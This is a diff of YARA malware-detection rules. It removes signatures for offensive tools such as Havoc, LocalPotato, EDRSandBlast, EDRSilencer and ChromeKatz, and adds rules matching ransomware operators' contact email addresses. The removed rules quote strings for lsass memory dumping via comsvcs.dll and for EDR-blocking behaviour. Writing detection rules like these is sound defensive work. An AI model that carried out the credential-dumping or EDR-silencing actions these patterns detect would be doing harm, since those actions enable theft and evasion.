+		logic_hash = "0e8b426e55c1efaf59e5f255f1da9cdfbb509561d3f7ea5baa2815c3131866eb"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "process PID:" fullword wide
-		$s2 = "Dump file created:" fullword wide
-		$s3 = "System.Security.AccessControl.FileSystemAccessRule('Everyone', 'FullControl', 'Allow')" ascii
-		$s4 = "{[math]::Round($_.PrivateMemorySize64" ascii
-		$s5 = "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump $" ascii
-		$s6 = "\"payload\":{\"logins\":" ascii
-		$s7 = "\\pandora.pdb" ascii
+		$s1 = "vovanandlexus@cock.li" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		any of them
 }
-
-rule DITEKSHEN_INDICATOR_TOOL_Havoc : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Alumnilocker
 {
 	meta:
-		description = "Detects Havoc Demon"
-		author = "ditekSHen"
-		id = "71ad145c-4017-597a-837e-5d11ba64d7c0"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with AlumniLocker ransomware"
+		author = "ditekShen"
+		id = "64b6aff8-3758-5837-b814-e2505a9c12a3"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1693-L1710"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L194-L202"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c5806deaa57590ebe1923608b9b085460e0edd024721e6e9d7073765a79bf22b"
+		logic_hash = "aeab9cb2b2da246e1863cd1102d901d322017d0b309e852d83e4f66f6e4bdd22"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$x1 = "X-Havoc:" wide
-		$x2 = "X-Havoc-Agent:" wide
-		$s1 = "\\Werfault.exe" wide
-		$s2 = "/funny_cat.gif" wide
+		$s1 = "alumnilocker@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 3 of them or ( pe.number_of_imports == 0 and pe.number_of_exports == 0 and 2 of them ) )
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOLS_Localpotato : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Doejocrypt
 {
 	meta:
-		description = "Detects LocalPotato"
+		description = "Detects files referencing identities associated with DoejoCrypt ransomware"
 		author = "ditekShen"
-		id = "65f8305b-b830-58e7-970b-da1df9a06e9b"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "bdf67fd3-8614-52f0-8804-9905f067a848"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1712-L1743"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L204-L213"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "88fba16a6eec6d2c23331642041c6adfddddeb21ba8e74b6959bd48c90f73cbb"
+		logic_hash = "b76996ef413d017fa571115f7331154c808fed0f1b1e0c97241cadbbef260a00"
 		score = 75
-		quality = 73
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$x1 = "LocalPotato.stg" fullword wide
-		$x2 = "we always love potatoes" fullword ascii
-		$s1 = "{00000306-0000-0000-c000-000000000046}" wide
-		$s2 = "{854A20FB-2D44-457D-992F-EF13785D2B51}" wide
-		$s3 = "cifs/127.0.0.1" wide
-		$s4 = "\\\\127.0.0.1\\c$" wide
-		$s5 = "complete failed: 0x%08x" ascii
-		$s6 = "Authorization: NTLM %s" ascii
-		$s7 = "Objref Moniker Display Name = %S" ascii
-		$s8 = "SMB Connect Tree: %S" ascii
-		$s9 = "b64type=%s" fullword ascii
-		$s10 = "decodes=%s" fullword ascii
-		$s11 = { 53 4d 42 72 00 00 00 00 18 01 48 00 00 00 00 00
-               00 00 00 00 00 00 00 ff ff ac 7b 00 00 00 00 00
-               22 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00 02 53
-               4d 42 20 32 2e 30 30 32 00 02 53 4d 42 20 32 2e
-               3f 3f 3f 00 00 00 00 00 00 00 00 00 00 00 68 fe
-               53 4d 42 40 }
-		$o1 = { 44 8b 4c 24 34 48 8d 44 24 38 48 89 44 24 28 4c }
-		$o2 = { e8 c4 ff ff ff 33 d2 48 8d 4d f0 41 b8 d0 04 00 }
-		$o3 = { 83 7b 0c 00 75 42 8b 03 25 ff ff ff 1f 3d 21 05 }
-		$o4 = { 3c 68 74 6c 3c 6a 74 5c 3c 6c 74 34 3c 74 74 24 }
-		$o5 = { e9 39 ff ff ff cc 48 89 5c 24 08 4c 89 4c 24 20 }
-		$o6 = { 48 b9 ff ff ff ff ff ff 0f 00 48 8b c2 41 b8 0c }
+		$s1 = "konedieyp@airmail.cc" ascii wide nocase
+		$s2 = "uenwonken@memail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or 8 of ( $s* ) or ( 4 of ( $o* ) and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) )
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOLS_Edrsandblast : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Purge
 {
 	meta:
-		description = "Detects EDRSandBlast"
+		description = "Detects files referencing identities associated with Purge ransomware"
 		author = "ditekShen"
-		id = "85d6d82b-a30e-5c79-93e7-8a3bbbf4a403"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "2a0f2c69-b179-5e48-9db6-be25e329f72b"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1745-L1767"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L215-L224"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b801f053e42fbd646cf62fecf6cbf5f2cceeec82bed93ecd8625984eccb08c6"
+		logic_hash = "49f3f5a88212d4bed1f0237a4437fb537e84cd6dd26c5fe224250f3b6e39d384"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "credguard" fullword wide
-		$s2 = "\\cmd.exe" fullword wide
-		$s3 = "ci_%s.dll" fullword wide
-		$s4 = "cmd /c sc" wide
-		$s5 = "fltmgr_%s.sys" fullword wide
-		$s6 = "ntoskrnl_%s.exe" fullword wide
-		$s7 = "ProductDir" fullword wide
-		$s8 = "lsass.exe" fullword wide
-		$s9 = "0x%p;%ws;%ws;;;" ascii
-		$s10 = "MiniDumpWriteDump" ascii
-		$s11 = "EDRSB_Init: %u" ascii
-		$s12 = "ntoskrnloffsets.csv" fullword wide nocase
-		$s13 = "wdigestoffsets.csv" fullword wide nocase
-		$o1 = { eb 0e 8b 85 34 15 00 00 ff c0 89 85 34 15 00 00 }
-		$o2 = { 74 48 8b 85 34 15 00 00 41 b9 04 01 00 00 4c 8d }
+		$s1 = "rscl@dr.com" ascii wide nocase
+		$s2 = "rscl@usa.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOLS_Rsockstun : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Zeoticus
 {
 	meta:
-		description = "Detects rsockstun"
+		description = "Detects files referencing identities associated with Zeoticus ransomware"
 		author = "ditekShen"
-		id = "a284a607-abea-5914-ad3a-84eaff733ee0"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "4d5f0d6d-f792-563d-9a9b-1986f5af8743"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1769-L1781"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L226-L235"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ad0ac389bf8961b0dd987a72d5dd534e5e3cc673f0e07aa49d39d1fd3f5f53e"
+		logic_hash = "7a83b15b0c8e81f67d11f8b5d9a43ba4e1e3a0f6741ddd0daafe4e742dd91cd8"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "main.connectviaproxy" ascii
-		$s2 = "main.connectForSocks" ascii
-		$s3 = "main.listenForClients" ascii
-		$s4 = "main.listenForSocks" ascii
-		$s5 = "Proxy-Authorization: NTLM TlRMTVNTUAABAAAABoIIAAAAAAAAAAAAAAAAAAAAAAA=" ascii
+		$s1 = "anobtanium@tutanota.com" ascii wide nocase
+		$s2 = "anobtanium@cock.li" ascii wide nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and all of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Scmaldevinj_Go : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Jobcryptor
 {
 	meta:
-		description = "Detects Go shell/malware dev injector"
+		description = "Detects files referencing identities associated with JobCryptor ransomware"
 		author = "ditekShen"
-		id = "56ec114f-8e16-5ab6-ae3b-a182cb381b4a"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "406f5638-883b-57a4-a2ba-532d2bd3ae83"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1783-L1793"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L237-L247"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48c3c759283c63a0c439cfba0194da89f402189e4c3cd831c22b5078ccae47b1"
+		logic_hash = "c8c5dcc0d7484a3ac6e702cca8bd0907f9e4f4aea5e99c4c3f988389e0d803a7"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 69
+		tags = ""
 
 	strings:
-		$s1 = "hooka/shellcode.go" ascii
-		$s2 = "/maldev\x09v" ascii
-		$s3 = "Binject/debug/pe." ascii
+		$s1 = "olaggoune235@protonmail.ch" ascii wide nocase
+		$s2 = "ouardia11@tutanota.com" ascii wide nocase
+		$s3 = "laggouneo11@gmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Reversessh_Go : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Cuba
 {
 	meta:
-		description = "Detects golang reverse ssh tool"
+		description = "Detects files referencing identities associated with JobCryptor ransomware"
 		author = "ditekShen"
-		id = "4fb671aa-ad42-5f7e-bd5a-c19f018088c9"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "5eea027d-2164-54f2-a2bf-74b5d532e610"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1795-L1804"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L249-L261"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f9899aacc09c7da05fb5d412cfe8e91ee0d8e922189a6f921410d73ae8b3a9c"
+		logic_hash = "b734199c8593c338c803518b2729e9d9ceaaed5d21585a3d299885433d8f796e"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 65
+		tags = ""
 
 	strings:
-		$s1 = "/reverse_ssh/" ascii
-		$s2 = "main.rsshService" ascii
+		$s1 = "helpadmin2@protonmail.com" ascii wide nocase
+		$s2 = "helpadmin2@cock.li" ascii wide nocase
+		$s3 = "mfra@cock.li" ascii wide nocase
+		$s4 = "admin@cuba-supp.com" ascii wide nocase
+		$s5 = "cuba_support@exploit.im" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Sharpghosttask : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Hello
 {
 	meta:
-		description = "Detects SharpGhostTask"
-		author = "ditekSHen"
-		id = "84d71179-0cfd-5389-b6bd-92c292361b3c"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with Hello / WickrMe ransomware"
+		author = "ditekShen"
+		id = "02bbaa61-7ea3-5edd-8b38-27ef1f6ee1e2"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1806-L1817"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L263-L277"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3de8d9fe7804e208ff556b6bedbd80eebfda1a730626403418a555ad9fbbb820"
+		logic_hash = "dfafb0323a50891c03c4b706d4f3a6a511cecdee2448c1f554b416ba1e3d3df9"
 		score = 75
-		quality = 50
-		tags = "FILE"
+		quality = 61
+		tags = ""
 
 	strings:
-		$x1 = "Ghosted" wide
-		$x2 = /--target(binary|task)/ fullword wide
-		$x3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\T" wide nocase
-		$s4 = "__GhostTask|" ascii
+		$s1 = "emming@tutanota.com" ascii wide nocase
+		$s2 = "ampbel@protonmail.com" ascii wide nocase
+		$s3 = "asauribe@tutanota.com" ascii wide nocase
+		$s4 = "candietodd@tutanota.com" ascii wide nocase
+		$s5 = "kellyreiff@tutanota.com" ascii wide nocase
+		$s6 = "kevindeloach@protonmail.com" ascii wide nocase
+		$s7 = "sheilabeasley@tutanota.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Krbrelay : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Unlockyourfiles
 {
 	meta:
-		description = "Detects KrbRelay"
-		author = "ditekshen"
-		id = "c8baac8a-54f3-5f53-93f8-daabeaaaff44"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with UnlockYourFiles ransomware"
+		author = "ditekShen"
+		id = "fdc3ec49-66cc-5a0b-87a6-3660dd6f3b72"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1819-L1836"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L279-L288"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f76b585cd2d741eab9d91ffd5a34c38696ac573cba1a3752d21c4b8b6681ad7b"
+		logic_hash = "a33dae7f08eb0c2415fbfdadf2cbbf90c68bc802352277422c6d0a2dbd62cd82"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "System.Collections.Generic.IEnumerable<System.IntPtr>.GetEnumerator" fullword ascii
-		$s2 = "System.Collections.Generic.IEnumerator<System.IntPtr>.get_Current" fullword ascii
-		$s3 = "GetProcessIdFromIPid" fullword ascii
-		$g1 = "hello.stg" fullword wide
-		$g2 = "DSInternals.Common" fullword ascii
-		$g3 = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_7b3eed059f4c3e41\\Amd64\\UNIDRV.DLL" fullword wide
-		$g4 = "C:\\Windows\\System32\\kernelbase.dll" fullword wide
-		$g5 = "get_UnsupportedSecretEncryptionType" fullword ascii
-		$g6 = "CoInitializeSecurity Error: 0x{0:X8}. Exploit will fail." fullword wide
-		$g7 = "AuthnSvc: {0} - PrincName: {1}" fullword wide
+		$s1 = "4lok3r@tutanota.com" ascii wide nocase
+		$s2 = "4lok3r@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 4 of ( $g* ) ) or ( 7 of them ) )
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Edrsilencer : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Darkside
 {
 	meta:
-		description = "Detects EDRSilencer"
-		author = "ditekshen"
-		id = "29b6da1e-9138-5ee6-b9fd-d7b3c7f48626"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with DarkSide ransomware"
+		author = "ditekShen"
+		id = "7b29b9b9-4657-551e-b770-880a2278ef60"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1838-L1857"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L290-L299"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "da00aced2608fd5e192397ef2346ac247f29f993995fb90189e05da60be15d13"
+		logic_hash = "3c6cdb15cad19f1db38c0fe03ecb24d5cd4861a699aa2bee0f99b8dddacc8bd1"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
+		hash1 = "bafa2efff234303166d663f967037dae43701e7d63d914efc8c894b3e5be9408"
 
 	strings:
-		$s1 = "block \"C:\\Windows\\System32\\curl.exe\"" ascii
-		$s2 = "blockedr" fullword ascii
-		$s3 = "edrProcess" fullword ascii
-		$s4 = "BlockEdrProcessTraffic" fullword ascii
-		$s5 = "isInEdrProcessList" fullword ascii
-		$s6 = "EDRSilencer.c" fullword ascii
-		$v1 = "elastic-agent.exe" fullword ascii nocase
-		$v2 = "CybereasonAV.exe" fullword ascii nocase
-		$v3 = "SentinelAgent.exe" fullword ascii nocase
-		$v4 = "fortiedr.exe" fullword ascii nocase
-		$v5 = "MsMpEng.exe" fullword ascii nocase
-		$v6 = "CylanceSvc.exe" fullword ascii nocase
+		$s1 = "breathcojunktab1987@yahoo.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $v* ) ) )
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Edrprison : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Spyro
 {
 	meta:
-		description = "Detects EDRPrison"
-		author = "ditekshen"
-		id = "85831265-fd9e-5e0e-b5d9-22bf1c89b3f2"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with Spyro ransomware"
+		author = "ditekShen"
+		id = "9a42a9fd-dfaf-5719-acae-e7c3b92ecdc9"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1859-L1872"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L301-L310"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e1ef9e9c6bd0d2efa7b0b617fb52100075658221559f92a61c672807ab5a4d77"
+		logic_hash = "b12b24b7b1b9800d249fd322532d957ddfc020c495ca89414d8d7e9fa7d58eb7"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "Block:" wide
-		$s2 = "PacketLen:" wide
-		$s3 = "DoWorkPacket_Step" ascii
-		$s4 = "DoWorkAsyncNETWORK" ascii
-		$s5 = "BlockMessage" ascii
-		$s6 = "GetRmAddrPortNetwork" ascii
+		$s1 = "blackspyro@tutanota.com" ascii wide nocase
+		$s2 = "blackspyro@mailfence.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Sharpsqlpwn : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ryzerlo
 {
 	meta:
-		description = "Detects SharpSQLPwn"
-		author = "ditekshen"
-		id = "f99c0ddb-a073-5c15-9a7c-60f6766cd0a2"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with Ryzerlo / HiddenTear / RSJON ransomware"
+		author = "ditekShen"
+		id = "1e8b79dc-4a81-5126-a7a3-ad7a2e8f62bf"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1874-L1891"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L312-L320"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c811d4926c433c6521f4bbe03a1abf4a5b27b56931a18a8bb672f37fe4fccfb8"
+		logic_hash = "2d925cac74411c3e408d674e27a27ae029d39977026a79df8f90edae345a31db"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "smb_ip" fullword ascii
-		$s2 = "Recon" fullword ascii
-		$s3 = "UNCPathInjection" fullword ascii
-		$s4 = "from sys.server_principals" wide
-		$s5 = "EXEC sp_configure '" wide
-		$s6 = "EXEC ('sp_configure" wide
-		$s7 = "CREATE ASSEMBLY" wide
-		$s8 = "DROP ASSEMBLY" wide
-		$s9 = "FROM 0x" wide
-		$s10 = "EXEC master..xp_dirtree \"\\\\" wide
+		$s1 = "darkjon@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Chromekatz : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_PYSA
 {
 	meta:
-		description = "Detects ChromeKatz: CookieKatz and CredentialKatz"
-		author = "ditekshen"
-		id = "9dd706c8-552c-5c96-9b81-cfd50157ac34"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with PYSA / Mespinoza ransomware"
+		author = "ditekShen"
+		id = "b26d472b-c94e-576d-b168-6f273bb8fca5"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1893-L1908"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L322-L340"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f1bdbb7f8c4893444baac287c8fcefaca80a4301845706b56e9f9628c9f116f"
+		logic_hash = "cf0fbc0160f1d21efdb4a6935ae0d2206107042e3d020722f50d2c302aff246c"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 55
+		tags = ""
 
 	strings:
-		$s1 = "\\include\\xmemory" ascii wide
-		$s2 = "targetBrowser" ascii
-		$s3 = "thirdPattern" ascii
-		$s4 = "isBrowserWow64" ascii
-		$s5 = "wcscpy_s(memory, size_in_elements, string)" fullword wide
-		$s6 = "hChrome" fullword ascii
-		$t1 = "szCookieMonster" fullword ascii
-		$t2 = "szPasswordReuseDetectorInstances" fullword ascii
+		$s1 = "luebegg8024@onionmail.org" ascii wide nocase
+		$s2 = "mayakinggw3732@onionmail.org" ascii wide nocase
+		$s3 = "lauriabornhat7722@protonmail.com" ascii wide nocase
+		$s4 = "DeborahTrask@onionmail.org" ascii wide nocase
+		$s5 = "AlisonRobles@onionmail.org" ascii wide nocase
+		$s6 = "NatanSchultz67@protonmail.com" ascii wide nocase
+		$s7 = "jonikemppi@onionmail.org" ascii wide nocase
+		$s8 = "lanerosalie49003@onionmail.org" ascii wide nocase
+		$s9 = "bernalmargaret645@onionmail.org" ascii wide nocase
+		$s10 = "carlhubbard2021@protonmail.com" ascii wide nocase
+		$u1 = "http://pysa2bitc" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		any of them
 }
-/*
- * YARA Rule Set
- * Repository Name: WithSecureLabs
- * Repository: https://github.com/WithSecureLabs/iocs
- * Retrieval Date: 2025-06-08
- * Git Commit: a5e50e76f7829cbab219bec94bf1887dea9bb304
- * Number of Rules: 5
- * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
- *
- *
- * LICENSE
- *
- * BSD 2-Clause License
-
-Copyright (c) [2022], [WithSecure Oyj]
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-1. Redistributions of source code must retain the above copyright notice, this
-   list of conditions and the following disclaimer.
-
-2. Redistributions in binary form must reproduce the above copyright notice,
-   this list of conditions and the following disclaimer in the documentation
-   and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
- */
-
-rule WITHSECURELABS_Kapeka_Backdoor : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ranzylocker
 {
 	meta:
-		description = "Detects Kapeka backdoor based on common strings."
-		author = "WithSecure"
-		id = "7b874a4a-a009-5365-9c31-ca61bf5ab491"
-		date = "2024-04-17"
-		modified = "2024-04-17"
-		reference = "https://labs.withsecure.com/publications/kapeka"
-		source_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/Kapeka/kapeka_backdoor.yar#L2-L21"
-		license_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/LICENSE"
-		logic_hash = "49795c6e3f3690eeccd731a9ba0c6bd8d5840d9171939e71d3a4d6f0d1834f05"
+		description = "Detects files referencing identities associated with RanzyLocker ransomware"
+		author = "ditekShen"
+		id = "33478dc4-c0ec-5cc8-8620-79e770f6a773"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L354-L363"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "dc345257a3cca82a95e20505c94e90d8ac42240e1491ea1f34be121871673e26"
 		score = 75
-		quality = 25
-		tags = "FILE"
-		version = "1.0"
-		hash1 = "97e0e161d673925e42cdf04763e7eaa53035338b"
-		hash2 = "9bbde40cab30916b42e59208fbcc09affef525c1"
-		hash3 = "6c3441b5a4d3d39e9695d176b0e83a2c55fe5b4e"
